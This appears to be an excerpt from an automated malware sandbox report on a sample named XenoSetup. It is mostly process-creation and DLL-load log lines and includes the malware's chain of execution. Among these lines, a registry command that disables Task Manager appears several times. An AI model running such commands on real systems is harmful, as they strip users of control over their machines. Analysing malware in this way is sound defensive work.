                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES4177.tmp" "c:\Program Files (x86)\Microsoft\Edge\Application\CSCEACDD11852CD4DF0A8C4FA8867592994.TMP"
                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES436B.tmp" "c:\Users\user\AppData\Local\Temp\CSCF5A66DC0AE3041F58A3C1CE4B9A61B98.TMP"
                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES458E.tmp" "c:\Windows\System32\CSC3568A44F8D2D461ABD894E9C160B8C.TMP"
                      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\chcp.com chcp 65001
                      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\PING.EXE ping -n 10 localhost
                      Source: C:\Windows\System32\cmd.exeProcess created: C:\portBrokerDll\DriverbrokerCrtDhcp.exe "C:\portBrokerDll\DriverbrokerCrtDhcp.exe"
                      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\reg.exe reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System /v DisableTaskMgr /t REG_DWORD /d 1 /f
                      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\portBrokerDll\DriverbrokerCrtDhcp.exe "C:\portBrokerDll/DriverbrokerCrtDhcp.exe"
                      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\reg.exe reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System /v DisableTaskMgr /t REG_DWORD /d 1 /f
                      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\portBrokerDll\DriverbrokerCrtDhcp.exe "C:\portBrokerDll/DriverbrokerCrtDhcp.exe"
                      Source: C:\Users\user\Desktop\XenoSetup(2).exe.bin.exeSection loaded: mscoree.dllJump to behavior
                      Source: C:\Users\user\Desktop\XenoSetup(2).exe.bin.exeSection loaded: apphelp.dllJump to behavior
                      Source: C:\Users\user\Desktop\XenoSetup(2).exe.bin.exeSection loaded: kernel.appcore.dllJump to behavior
                      Source: C:\Users\user\Desktop\XenoSetup(2).exe.bin.exeSection loaded: version.dllJump to behavior
                      Source: C:\Users\user\Desktop\XenoSetup(2).exe.bin.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                      Source: C:\Users\user\Desktop\XenoSetup(2).exe.bin.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                      Source: C:\Users\user\Desktop\XenoSetup(2).exe.bin.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                      Source: C:\Users\user\Desktop\XenoSetup(2).exe.bin.exeSection loaded: uxtheme.dllJump to behavior
                      Source: C:\Users\user\Desktop\XenoSetup(2).exe.bin.exeSection loaded: windows.storage.dllJump to behavior
                      Source: C:\Users\user\Desktop\XenoSetup(2).exe.bin.exeSection loaded: wldp.dllJump to behavior
                      Source: C:\Users\user\Desktop\XenoSetup(2).exe.bin.exeSection loaded: propsys.dllJump to behavior
                      Source: C:\Users\user\Desktop\XenoSetup(2).exe.bin.exeSection loaded: profapi.dllJump to behavior
                      Source: C:\Users\user\Desktop\XenoSetup(2).exe.bin.exeSection loaded: edputil.dllJump to behavior
                      Source: C:\Users\user\Desktop\XenoSetup(2).exe.bin.exeSection loaded: urlmon.dllJump to behavior
                      Source: C:\Users\user\Desktop\XenoSetup(2).exe.bin.exeSection loaded: iertutil.dllJump to behavior
                      Source: C:\Users\user\Desktop\XenoSetup(2).exe.bin.exeSection loaded: srvcli.dllJump to behavior
                      Source: C:\Users\user\Desktop\XenoSetup(2).exe.bin.exeSection loaded: netutils.dllJump to behavior
                      Source: C:\Users\user\Desktop\XenoSetup(2).exe.bin.exeSection loaded: windows.staterepositoryps.dllJump to behavior
                      Source: C:\Users\user\Desktop\XenoSetup(2).exe.bin.exeSection loaded: sspicli.dllJump to behavior
                      Source: C:\Users\user\Desktop\XenoSetup(2).exe.bin.exeSection loaded: wintypes.dllJump to behavior
                      Source: C:\Users\user\Desktop\XenoSetup(2).exe.bin.exeSection loaded: appresolver.dllJump to behavior
                      Source: C:\Users\user\Desktop\XenoSetup(2).exe.bin.exeSection loaded: bcp47langs.dllJump to behavior
                      Source: C:\Users\user\Desktop\XenoSetup(2).exe.bin.exeSection loaded: slc.dllJump to behavior
                      Source: C:\Users\user\Desktop\XenoSetup(2).exe.bin.exeSection loaded: userenv.dllJump to behavior
                      Source: C:\Users\user\Desktop\XenoSetup(2).exe.bin.exeSection loaded: sppc.dllJump to behavior
                      Source: C:\Users\user\Desktop\XenoSetup(2).exe.bin.exeSection loaded: onecorecommonproxystub.dllJump to behavior
                      Source: C:\Users\user\Desktop\XenoSetup(2).exe.bin.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
                      Source: C:\Users\user\Desktop\XenoSetup(2).exe.bin.exeSection loaded: cryptsp.dllJump to behavior
                      Source: C:\Users\user\Desktop\XenoSetup(2).exe.bin.exeSection loaded: rsaenh.dllJump to behavior
                      Source: C:\Users\user\Desktop\XenoSetup(2).exe.bin.exeSection loaded: cryptbase.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: microsoft.management.infrastructure.native.unmanaged.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mi.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: miutils.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wmidcom.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dpapi.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\XenoSetup(1).exeSection loaded: <pi-ms-win-core-synch-l1-2-0.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\XenoSetup(1).exeSection loaded: <pi-ms-win-core-fibers-l1-1-1.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\XenoSetup(1).exeSection loaded: <pi-ms-win-core-synch-l1-2-0.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\XenoSetup(1).exeSection loaded: <pi-ms-win-core-fibers-l1-1-1.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\XenoSetup(1).exeSection loaded: <pi-ms-win-core-localization-l1-2-1.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\XenoSetup(1).exeSection loaded: version.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\XenoSetup(1).exeSection loaded: dxgidebug.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\XenoSetup(1).exeSection loaded: sfc_os.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\XenoSetup(1).exeSection loaded: sspicli.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\XenoSetup(1).exeSection loaded: rsaenh.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\XenoSetup(1).exeSection loaded: uxtheme.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\XenoSetup(1).exeSection loaded: dwmapi.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\XenoSetup(1).exeSection loaded: cryptbase.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\XenoSetup(1).exeSection loaded: riched20.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\XenoSetup(1).exeSection loaded: usp10.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\XenoSetup(1).exeSection loaded: msls31.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\XenoSetup(1).exeSection loaded: kernel.appcore.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\XenoSetup(1).exeSection loaded: iconcodecservice.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\XenoSetup(1).exeSection loaded: windowscodecs.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\XenoSetup(1).exeSection loaded: textshaping.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\XenoSetup(1).exeSection loaded: textinputframework.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\XenoSetup(1).exeSection loaded: coreuicomponents.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\XenoSetup(1).exeSection loaded: coremessaging.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\XenoSetup(1).exeSection loaded: ntmarta.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\XenoSetup(1).exeSection loaded: wintypes.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\XenoSetup(1).exeSection loaded: wintypes.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\XenoSetup(1).exeSection loaded: wintypes.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\XenoSetup(1).exeSection loaded: windows.storage.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\XenoSetup(1).exeSection loaded: wldp.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\XenoSetup(1).exeSection loaded: propsys.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\XenoSetup(1).exeSection loaded: profapi.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\XenoSetup(1).exeSection loaded: edputil.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\XenoSetup(1).exeSection loaded: urlmon.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\XenoSetup(1).exeSection loaded: iertutil.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\XenoSetup(1).exeSection loaded: srvcli.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\XenoSetup(1).exeSection loaded: netutils.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\XenoSetup(1).exeSection loaded: windows.staterepositoryps.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\XenoSetup(1).exeSection loaded: policymanager.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\XenoSetup(1).exeSection loaded: msvcp110_win.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\XenoSetup(1).exeSection loaded: appresolver.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\XenoSetup(1).exeSection loaded: bcp47langs.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\XenoSetup(1).exeSection loaded: slc.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\XenoSetup(1).exeSection loaded: userenv.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\XenoSetup(1).exeSection loaded: sppc.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\XenoSetup(1).exeSection loaded: onecorecommonproxystub.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\XenoSetup(1).exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\XenoSetup(1).exeSection loaded: pcacli.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\XenoSetup(1).exeSection loaded: mpr.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\Xeno.exeSection loaded: apphelp.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\Xeno.exeSection loaded: kernel.appcore.dllJump to behavior
                      Source: C:\Windows\SysWOW64\wscript.exeSection loaded: version.dllJump to behavior
                      Source: C:\Windows\SysWOW64\wscript.exeSection loaded: kernel.appcore.dllJump to behavior
                      Source: C:\Windows\SysWOW64\wscript.exeSection loaded: uxtheme.dllJump to behavior
                      Source: C:\Windows\SysWOW64\wscript.exeSection loaded: sxs.dllJump to behavior
                      Source: C:\Windows\SysWOW64\wscript.exeSection loaded: vbscript.dllJump to behavior
                      Source: C:\Windows\SysWOW64\wscript.exeSection loaded: amsi.dllJump to behavior
                      Source: C:\Windows\SysWOW64\wscript.exeSection loaded: userenv.dllJump to behavior
                      Source: C:\Windows\SysWOW64\wscript.exeSection loaded: profapi.dllJump to behavior
                      Source: C:\Windows\SysWOW64\wscript.exeSection loaded: wldp.dllJump to behavior
                      Source: C:\Windows\SysWOW64\wscript.exeSection loaded: msasn1.dllJump to behavior
                      Source: C:\Windows\SysWOW64\wscript.exeSection loaded: cryptsp.dllJump to behavior
                      Source: C:\Windows\SysWOW64\wscript.exeSection loaded: rsaenh.dllJump to behavior
                      Source: C:\Windows\SysWOW64\wscript.exeSection loaded: cryptbase.dllJump to behavior
                      Source: C:\Windows\SysWOW64\wscript.exeSection loaded: msisip.dllJump to behavior
                      Source: C:\Windows\SysWOW64\wscript.exeSection loaded: wshext.dllJump to behavior
                      Source: C:\Windows\SysWOW64\wscript.exeSection loaded: scrobj.dllJump to behavior
                      Source: C:\Windows\SysWOW64\wscript.exeSection loaded: mpr.dllJump to behavior
                      Source: C:\Windows\SysWOW64\wscript.exeSection loaded: scrrun.dllJump to behavior
                      Source: C:\Windows\SysWOW64\wscript.exeSection loaded: gpapi.dllJump to behavior
                      Source: C:\Windows\SysWOW64\wscript.exeSection loaded: windows.storage.dllJump to behavior
                      Source: C:\Windows\SysWOW64\wscript.exeSection loaded: propsys.dllJump to behavior
                      Source: C:\Windows\SysWOW64\wscript.exeSection loaded: apphelp.dllJump to behavior
                      Source: C:\Windows\SysWOW64\wscript.exeSection loaded: dlnashext.dllJump to behavior
                      Source: C:\Windows\SysWOW64\wscript.exeSection loaded: wpdshext.dllJump to behavior
                      Source: C:\Windows\SysWOW64\wscript.exeSection loaded: edputil.dllJump to behavior
                      Source: C:\Windows\SysWOW64\wscript.exeSection loaded: urlmon.dllJump to behavior
                      Source: C:\Windows\SysWOW64\wscript.exeSection loaded: iertutil.dllJump to behavior
                      Source: C:\Windows\SysWOW64\wscript.exeSection loaded: srvcli.dllJump to behavior
                      Source: C:\Windows\SysWOW64\wscript.exeSection loaded: netutils.dllJump to behavior
                      Source: C:\Windows\SysWOW64\wscript.exeSection loaded: windows.staterepositoryps.dllJump to behavior
                      Source: C:\Windows\SysWOW64\wscript.exeSection loaded: sspicli.dllJump to behavior
                      Source: C:\Windows\SysWOW64\wscript.exeSection loaded: wintypes.dllJump to behavior
                      Source: C:\Windows\SysWOW64\wscript.exeSection loaded: appresolver.dllJump to behavior
                      Source: C:\Windows\SysWOW64\wscript.exeSection loaded: bcp47langs.dllJump to behavior
                      Source: C:\Windows\SysWOW64\wscript.exeSection loaded: slc.dllJump to behavior
                      Source: C:\Windows\SysWOW64\wscript.exeSection loaded: sppc.dllJump to behavior
                      Source: C:\Windows\SysWOW64\wscript.exeSection loaded: onecorecommonproxystub.dllJump to behavior
                      Source: C:\Windows\SysWOW64\wscript.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\XenoSetup(1).exeSection loaded: <pi-ms-win-core-synch-l1-2-0.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\XenoSetup(1).exeSection loaded: <pi-ms-win-core-fibers-l1-1-1.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\XenoSetup(1).exeSection loaded: <pi-ms-win-core-synch-l1-2-0.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\XenoSetup(1).exeSection loaded: <pi-ms-win-core-fibers-l1-1-1.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\XenoSetup(1).exeSection loaded: <pi-ms-win-core-localization-l1-2-1.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\XenoSetup(1).exeSection loaded: version.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\XenoSetup(1).exeSection loaded: dxgidebug.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\XenoSetup(1).exeSection loaded: sfc_os.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\XenoSetup(1).exeSection loaded: sspicli.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\XenoSetup(1).exeSection loaded: rsaenh.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\XenoSetup(1).exeSection loaded: uxtheme.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\XenoSetup(1).exeSection loaded: dwmapi.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\XenoSetup(1).exeSection loaded: cryptbase.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\XenoSetup(1).exeSection loaded: riched20.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\XenoSetup(1).exeSection loaded: usp10.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\XenoSetup(1).exeSection loaded: msls31.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\XenoSetup(1).exeSection loaded: kernel.appcore.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\XenoSetup(1).exeSection loaded: iconcodecservice.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\XenoSetup(1).exeSection loaded: windowscodecs.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\XenoSetup(1).exeSection loaded: textshaping.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\XenoSetup(1).exeSection loaded: textinputframework.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\XenoSetup(1).exeSection loaded: coreuicomponents.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\XenoSetup(1).exeSection loaded: coremessaging.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\XenoSetup(1).exeSection loaded: ntmarta.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\XenoSetup(1).exeSection loaded: coremessaging.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\XenoSetup(1).exeSection loaded: wintypes.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\XenoSetup(1).exeSection loaded: wintypes.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\XenoSetup(1).exeSection loaded: wintypes.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\XenoSetup(1).exeSection loaded: windows.storage.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\XenoSetup(1).exeSection loaded: wldp.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\XenoSetup(1).exeSection loaded: propsys.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\XenoSetup(1).exeSection loaded: profapi.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\XenoSetup(1).exeSection loaded: edputil.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\XenoSetup(1).exeSection loaded: urlmon.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\XenoSetup(1).exeSection loaded: iertutil.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\XenoSetup(1).exeSection loaded: srvcli.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\XenoSetup(1).exeSection loaded: netutils.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\XenoSetup(1).exeSection loaded: windows.staterepositoryps.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\XenoSetup(1).exeSection loaded: policymanager.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\XenoSetup(1).exeSection loaded: msvcp110_win.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\XenoSetup(1).exeSection loaded: appresolver.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\XenoSetup(1).exeSection loaded: bcp47langs.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\XenoSetup(1).exeSection loaded: slc.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\XenoSetup(1).exeSection loaded: userenv.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\XenoSetup(1).exeSection loaded: sppc.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\XenoSetup(1).exeSection loaded: onecorecommonproxystub.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\XenoSetup(1).exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\XenoSetup(1).exeSection loaded: pcacli.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\XenoSetup(1).exeSection loaded: mpr.dllJump to behavior
                      Source: C:\Windows\SysWOW64\wscript.exeSection loaded: version.dll
                      Source: C:\Windows\SysWOW64\wscript.exeSection loaded: kernel.appcore.dll
                      Source: C:\Windows\SysWOW64\wscript.exeSection loaded: uxtheme.dll
                      Source: C:\Windows\SysWOW64\wscript.exeSection loaded: sxs.dll
                      Source: C:\Windows\SysWOW64\wscript.exeSection loaded: vbscript.dll
                      Source: C:\Windows\SysWOW64\wscript.exeSection loaded: amsi.dll
                      Source: C:\Windows\SysWOW64\wscript.exeSection loaded: userenv.dll
                      Source: C:\Windows\SysWOW64\wscript.exeSection loaded: profapi.dll
                      Source: C:\Windows\SysWOW64\wscript.exeSection loaded: wldp.dll
                      Source: C:\Windows\SysWOW64\wscript.exeSection loaded: msasn1.dll
                      Source: C:\Windows\SysWOW64\wscript.exeSection loaded: cryptsp.dll
                      Source: C:\Windows\SysWOW64\wscript.exeSection loaded: rsaenh.dll
                      Source: C:\Windows\SysWOW64\wscript.exeSection loaded: cryptbase.dll
                      Source: C:\Windows\SysWOW64\wscript.exeSection loaded: msisip.dll
                      Source: C:\Windows\SysWOW64\wscript.exeSection loaded: wshext.dll
                      Source: C:\Windows\SysWOW64\wscript.exeSection loaded: scrobj.dll
                      Source: C:\Windows\SysWOW64\wscript.exeSection loaded: mpr.dll
                      Source: C:\Windows\SysWOW64\wscript.exeSection loaded: scrrun.dll
                      Source: C:\Windows\SysWOW64\wscript.exeSection loaded: gpapi.dll
                      Source: C:\Windows\SysWOW64\wscript.exeSection loaded: windows.storage.dll
                      Source: C:\Windows\SysWOW64\wscript.exeSection loaded: propsys.dll
                      Source: C:\Windows\SysWOW64\wscript.exeSection loaded: apphelp.dll
                      Source: C:\Windows\SysWOW64\wscript.exeSection loaded: dlnashext.dll
                      Source: C:\Windows\SysWOW64\wscript.exeSection loaded: wpdshext.dll
                      Source: C:\Windows\SysWOW64\wscript.exeSection loaded: edputil.dll
                      Source: C:\Windows\SysWOW64\wscript.exeSection loaded: urlmon.dll
                      Source: C:\Windows\SysWOW64\wscript.exeSection loaded: iertutil.dll
                      Source: C:\Windows\SysWOW64\wscript.exeSection loaded: srvcli.dll
                      Source: C:\Windows\SysWOW64\wscript.exeSection loaded: netutils.dll
                      Source: C:\Windows\SysWOW64\wscript.exeSection loaded: windows.staterepositoryps.dll
                      Source: C:\Windows\SysWOW64\wscript.exeSection loaded: sspicli.dll
                      Source: C:\Windows\SysWOW64\wscript.exeSection loaded: wintypes.dll
                      Source: C:\Windows\SysWOW64\wscript.exeSection loaded: appresolver.dll
                      Source: C:\Windows\SysWOW64\wscript.exeSection loaded: bcp47langs.dll
                      Source: C:\Windows\SysWOW64\wscript.exeSection loaded: slc.dll
                      Source: C:\Windows\SysWOW64\wscript.exeSection loaded: sppc.dll
                      Source: C:\Windows\SysWOW64\wscript.exeSection loaded: onecorecommonproxystub.dll
                      Source: C:\Windows\SysWOW64\wscript.exeSection loaded: onecoreuapcommonproxystub.dll
                      Source: C:\Windows\SysWOW64\cmd.exeSection loaded: cmdext.dllJump to behavior
                      Source: C:\Windows\SysWOW64\cmd.exeSection loaded: apphelp.dllJump to behavior
                      Source: C:\portBrokerDll\DriverbrokerCrtDhcp.exeSection loaded: mscoree.dllJump to behavior
                      Source: C:\portBrokerDll\DriverbrokerCrtDhcp.exeSection loaded: apphelp.dllJump to behavior
                      Source: C:\portBrokerDll\DriverbrokerCrtDhcp.exeSection loaded: kernel.appcore.dllJump to behavior
                      Source: C:\portBrokerDll\DriverbrokerCrtDhcp.exeSection loaded: version.dllJump to behavior
                      Source: C:\portBrokerDll\DriverbrokerCrtDhcp.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                      Source: C:\portBrokerDll\DriverbrokerCrtDhcp.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                      Source: C:\portBrokerDll\DriverbrokerCrtDhcp.exeSection loaded: uxtheme.dllJump to behavior
                      Source: C:\portBrokerDll\DriverbrokerCrtDhcp.exeSection loaded: wldp.dllJump to behavior
                      Source: C:\portBrokerDll\DriverbrokerCrtDhcp.exeSection loaded: amsi.dllJump to behavior
                      Source: C:\portBrokerDll\DriverbrokerCrtDhcp.exeSection loaded: userenv.dllJump to behavior
                      Source: C:\portBrokerDll\DriverbrokerCrtDhcp.exeSection loaded: profapi.dllJump to behavior
                      Source: C:\portBrokerDll\DriverbrokerCrtDhcp.exeSection loaded: windows.storage.dllJump to behavior
                      Source: C:\portBrokerDll\DriverbrokerCrtDhcp.exeSection loaded: cryptsp.dllJump to behavior
                      Source: C:\portBrokerDll\DriverbrokerCrtDhcp.exeSection loaded: rsaenh.dllJump to behavior
                      Source: C:\portBrokerDll\DriverbrokerCrtDhcp.exeSection loaded: cryptbase.dllJump to behavior
                      Source: C:\portBrokerDll\DriverbrokerCrtDhcp.exeSection loaded: sspicli.dllJump to behavior
                      Source: C:\portBrokerDll\DriverbrokerCrtDhcp.exeSection loaded: ktmw32.dllJump to behavior
                      Source: C:\portBrokerDll\DriverbrokerCrtDhcp.exeSection loaded: ntmarta.dllJump to behavior
